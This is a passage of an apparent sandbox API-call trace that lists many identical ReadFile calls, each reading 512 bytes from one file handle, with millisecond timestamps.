nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.747] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.748] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.748] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.748] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.748] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.748] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.748] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.748] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.748] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.748] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.748] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.748] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.748] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.750] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.751] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.751] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.751] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.751] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.751] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.751] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.751] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.751] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.751] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.751] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.751] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.751] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.752] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.752] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.752] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.752] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.752] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.752] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.752] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.752] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.752] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.752] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.753] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.753] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.753] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.753] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.753] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.753] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.753] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.753] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.753] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.753] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.753] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.754] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.754] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.754] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.754] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.754] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.754] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.754] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.754] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.754] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.754] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.754] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.754] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, 